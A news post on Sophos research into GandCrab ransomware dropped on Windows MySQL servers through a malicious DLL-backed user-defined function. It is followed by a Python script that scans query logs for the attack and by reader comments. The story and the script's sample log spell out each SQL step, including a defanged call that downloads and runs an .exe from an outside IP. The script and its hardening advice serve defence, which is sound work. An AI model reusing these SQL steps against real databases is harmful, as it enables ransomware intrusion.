SoylentNews

posted by Fnord666 on Monday May 27 2019, @09:13PM
from the don't-do-that dept.

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then the attacker uses the SET command to load all the bytes of the helper DLL into memory as a session variable, and writes the contents of that variable out to a database table named yongger2.

The attacker then concatenates the bytes into a single file and drops it into the server's plugin directory. Analysis of the DLL showed that it exists to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker next drops the yongger2 table, and drops the function xpdl3 if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) backed by the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Through this scheme the attacker instructs the database server to download the GandCrab payload from the remote machine, drop it in the root of the C: drive as isetup.exe, and execute it.
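As an added example, not taken from the Sophos analysis or the original submission, the following Python script hunts for the stages of this chain in MySQL general query log lines and correlates them per connection. It assumes the general log in file format (timestamp, thread id, command, argument); the sample log lines are constructed to mirror the sequence described above rather than captured from a real server, the table, function and file names come from the text, and the partial hex literal is only an MZ header followed by padding.

```python
"""Hunt for the MySQL UDF loading chain described above in a general query log.

Added example, not part of the Sophos analysis or the original submission.
Assumes log_output=FILE formatting: "<timestamp> <thread id> <command> <argument>".
"""
import re
from collections import defaultdict

# One general-log line. Real logs separate fields with tabs; any whitespace is accepted here.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Stages of the chain, in the order the attacker performs them. Each is a regex over one query.
STAGES = [
    # a hex-encoded PE image (0x4d5a = "MZ") staged into a session variable
    ("hex_blob_in_variable",
     re.compile(r"\bSET\s+@\w+\s*=.*0x4d5a[0-9a-f]{60,}", re.I)),
    # the variable inserted into a table
    ("variable_written_to_table",
     re.compile(r"\bINSERT\s+INTO\s+\w+.*\(\s*@\w+\s*\)", re.I)),
    # the table contents dumped as a .dll into the plugin directory
    ("dll_dumped_to_plugin_dir",
     re.compile(r"\bINTO\s+DUMPFILE\s+'[^']*[\\/]plugin[\\/][^']*\.dll'", re.I)),
    # a UDF registered from a shared library
    ("udf_registered",
     re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\s+'[^']+'", re.I)),
    # the UDF called with a download URL and a local .exe path
    ("udf_called_with_url_and_exe",
     re.compile(r"\bSELECT\s+\w+\s*\(\s*'(?:hxxp|http)s?://[^']+'\s*,\s*'[^']+\.exe'", re.I)),
]


def parse(log_text):
    """Yield (thread_id, command, argument) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            yield int(m["tid"]), m["cmd"], m["arg"]


def find_udf_chains(log_text):
    """Correlate stages per connection (thread id).

    Returns {thread_id: {"source": "user@host" or None, "stages": [stage names in order seen]}}
    for every connection on which at least one stage fired.
    """
    sessions = defaultdict(lambda: {"source": None, "stages": []})
    for tid, cmd, arg in parse(log_text):
        if cmd == "Connect":
            # argument looks like "root@172.96.14.134 on <db> using TCP/IP"
            sessions[tid]["source"] = arg.split(" on ", 1)[0]
        elif cmd == "Query":
            for name, pattern in STAGES:
                if pattern.search(arg) and name not in sessions[tid]["stages"]:
                    sessions[tid]["stages"].append(name)
    return {tid: s for tid, s in sessions.items() if s["stages"]}


def classify(session):
    """'udf_loaded' when a DLL landed in the plugin dir and a UDF was registered on the
    same connection; otherwise 'suspicious' (a single stage is still worth a look)."""
    seen = set(session["stages"])
    if {"dll_dumped_to_plugin_dir", "udf_registered"} <= seen:
        return "udf_loaded"
    return "suspicious"


# Constructed sample: thread 12 replays the chain from the write-up, thread 13 is ordinary traffic.
SAMPLE_LOG = r"""
2019-05-20T10:02:11.001Z    12 Connect  root@172.96.14.134 on  using TCP/IP
2019-05-20T10:02:11.120Z    12 Query    SELECT @@version_compile_os
2019-05-20T10:02:12.005Z    12 Query    SET @a = concat('', 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000)
2019-05-20T10:02:12.300Z    12 Query    CREATE TABLE yongger2 (data LONGBLOB)
2019-05-20T10:02:12.410Z    12 Query    INSERT INTO yongger2 VALUES (@a)
2019-05-20T10:02:12.650Z    12 Query    SELECT data FROM yongger2 INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.7\\lib\\plugin\\cna12.dll'
2019-05-20T10:02:12.900Z    12 Query    DROP TABLE yongger2
2019-05-20T10:02:13.010Z    12 Query    DROP FUNCTION IF EXISTS xpdl3
2019-05-20T10:02:13.200Z    12 Query    CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
2019-05-20T10:02:13.500Z    12 Query    select xpdl3('hxxp://172.96.14.134:5471/3306-1.exe','c:\\isetup.exe')
2019-05-20T10:03:01.000Z    13 Connect  app@10.0.0.5 on shop using TCP/IP
2019-05-20T10:03:01.050Z    13 Query    SET @a = 1
2019-05-20T10:03:01.100Z    13 Query    SELECT id, name FROM products WHERE id = @a
"""

if __name__ == "__main__":
    for tid, session in find_udf_chains(SAMPLE_LOG).items():
        print(f"thread {tid} from {session['source']}: {classify(session)} -> {session['stages']}")
```

The correlation key is the connection: CREATE FUNCTION ... SONAME is rare enough on most production servers to alert on by itself, and a SELECT ... INTO DUMPFILE into the plugin directory from the same connection shortly before it is close to conclusive. Two caveats for practitioners. First, the general query log is off by default and costly on busy servers, so the same patterns are usually better watched in an audit plugin's output or at a proxy; a registered UDF also persists in the mysql.func table across restarts, so that table is worth checking for functions nobody installed. Second, the chain only works because the account the attacker logs in with holds the FILE privilege and can write into the plugin directory; pointing secure_file_priv at a directory that does not contain the plugin directory (or setting it to NULL) blocks the DUMPFILE step, and removing FILE from network-reachable accounts removes the capability altogether.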

Tracking back through the attack chain, the researchers determined that the malware had been downloaded from the source roughly 3,100 times since mid-April. Each download potentially indicates an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system hosting the malware (geolocated in Arizona) is in simplified Chinese.

While not a widespread attack by the numbers, it does represent a significant risk to MySQL databases exposed online.

Detailed Analysis

This discussion has been archived. No new comments can be posted.
  • (Score: 5, Interesting) by The Mighty Buzzard on Monday May 27 2019, @11:05PM (1 child)

    There's a big difference between giving IT staff full root on every box and every service without authentication and sanity though. Even ultra all-systems, all-services admins shouldn't default to having the keys to the kingdom from logging in to one box. I'd have to authenticate three different ways and ssh in from another SN server to monkey with the SN database with enough perms to do something like this (were we running windows so it was possible) when I've got keys to everything but the money. And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

    --
    My rights don't end where your fear begins.
  • (Score: 0) by Anonymous Coward on Tuesday May 28 2019, @07:58AM

    And we don't even put any serious brain power into figuring out how to better secure things here unless we're just bored and feel like doing so.

    You have to have something in the first place to put that something into, no?